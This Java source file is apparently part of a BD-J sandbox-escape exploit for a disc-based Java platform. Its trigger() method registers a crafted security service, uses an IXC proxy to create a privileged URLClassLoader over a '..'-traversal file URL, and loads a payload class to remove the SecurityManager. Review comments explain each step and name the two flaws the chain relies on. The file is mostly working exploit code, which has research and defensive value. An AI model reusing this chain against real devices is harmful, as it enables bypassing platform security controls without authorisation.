/*
 * Copyright (C) 2021 Andy Nguyen
 *
 * This software may be modified and distributed under the terms
 * of the MIT license. See the LICENSE file for details.
 */

package com.bdjb.exploit.sandbox;

import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.URL;
import java.net.URLClassLoader;
import java.security.Provider;
import java.security.Security;

/**
 * Implementation of the service+proxy exploit.
 *
 * <p>The chain visible in {@link #trigger()} has three stages: a {@code ServiceImpl} is registered
 * with the first installed security {@link Provider} so that it names {@link URLClassLoader} as the
 * type to instantiate; that service's {@code newInstance} is then invoked through an {@code
 * IxcProxyImpl} (the author's comment states this runs with privileges), yielding a class loader
 * rooted at a {@code file:} URL that uses {@code ..} segments to step out of the platform's {@code
 * lib/ext} directory onto the disc JAR; finally a payload class is loaded from that JAR and
 * instantiated. The method reports success only if no {@link SecurityManager} remains installed.
 *
 * <p>From a defensive standpoint the two properties this relies on are (1) a privileged reflective
 * instantiation being reachable through an IPC proxy, and (2) a trusted base path that accepts
 * un-canonicalized {@code ..} traversal. {@code IxcProxyImpl}, {@code ServiceImpl} and {@code
 * ProviderAccessorImpl} are project types not shown here; what they do internally is inferred from
 * their names and the author's comments only.
 *
 * <p>NOTE(review): {@code FileOutputStream}, {@code InputStream} and {@code OutputStream} are
 * imported but not used in this class.
 */
public class ExploitServiceProxyImpl implements ExploitSandboxInterface {
  // Platform class whose presence is checked first; if it is missing, trigger() throws
  // (ClassNotFoundException from Class.forName) rather than attempting the chain.
  private static final String SERVICE_CLASS_NAME = "com.oracle.security.Service";

  // Name and JVM method descriptor of the service method invoked through the proxy:
  // Object newInstance(Object).
  private static final String NEW_INSTANCE_METHOD_NAME = "newInstance";
  private static final String NEW_INSTANCE_METHOD_SIGNATURE = "(Ljava/lang/Object;)Ljava/lang/Object;";

  // Class loaded from the disc JAR and instantiated as the last step; per the author's comment
  // its instantiation is what disables the security manager (not visible in this file).
  private static final String PAYLOAD_CLASS_NAME = "com.bdjb.exploit.sandbox.Payload";

  // file: URL that starts under the platform's lib/ext directory and climbs out with ".."
  // segments to the disc's JAR. The author calls this the "vulnerable path" — presumably the
  // base-directory check does not canonicalize the URL before trusting it (confirm against the
  // platform code; not shown here).
  private static final String JAR_URL = "file:///app0/bdjstack/lib/ext/../../../../disc/BDMV/JAR/00000.jar";

  /**
   * Runs the service+proxy chain and reports whether the sandbox was escaped.
   *
   * <p>Steps, in the order they must run: check that the target service class exists; obtain the
   * IXC proxy; register a {@code ServiceImpl} naming {@link URLClassLoader} with the first
   * provider and install the provider accessor; invoke {@code newInstance} via the proxy to obtain
   * a privileged {@link URLClassLoader} over {@link #JAR_URL}; load and instantiate the payload
   * class through it.
   *
   * @return {@code true} if {@link System#getSecurityManager()} is {@code null} after the payload
   *     was instantiated, {@code false} otherwise
   * @throws Exception if the target class is absent ({@code ClassNotFoundException}), if the proxy
   *     invocation, class loading or instantiation fails, or if any project helper throws; the
   *     method does not catch anything itself
   */
  public boolean trigger() throws Exception {
    // Throw exception if class does not exist.
    Class.forName(SERVICE_CLASS_NAME);

    // Project-provided proxy; assumed to perform the privileged reflective call below.
    IxcProxyImpl proxy = IxcProxyImpl.getInstance();

    // Prepare service object with the class to be instantiated.
    // providers[0] is used without an empty-array check: Security.getProviders() is expected to
    // return at least one provider on this platform.
    Provider[] providers = Security.getProviders();
    ServiceImpl service =
        new ServiceImpl(
            providers[0], "exploit", "exploit", URLClassLoader.class.getName(), null, null);
    ProviderAccessorImpl providerAccessor = new ProviderAccessorImpl(providers);
    // The service must be registered and the accessor installed before the proxy call below;
    // what setProviderAccessor() patches is defined in the project type, not here.
    providerAccessor.putService(providers[0], service);
    providerAccessor.setProviderAccessor();

    // Instantiate the URLClassLoader class with privileges and a vulnerable path.
    // The single-element URL[] is the sole argument passed to Object newInstance(Object).
    URL[] urls = new URL[] {new URL(JAR_URL)};
    URLClassLoader urlClassLoader =
        (URLClassLoader)
            proxy.invokeMethod(
                service, NEW_INSTANCE_METHOD_NAME, NEW_INSTANCE_METHOD_SIGNATURE, new Object[] {urls});

    // Instantiate the payload class with all permissions to disable the security manager.
    Class payloadClass = urlClassLoader.loadClass(PAYLOAD_CLASS_NAME);
    payloadClass.newInstance();

    // Success indicator: the payload is expected to have removed the SecurityManager.
    return System.getSecurityManager() == null;
  }
}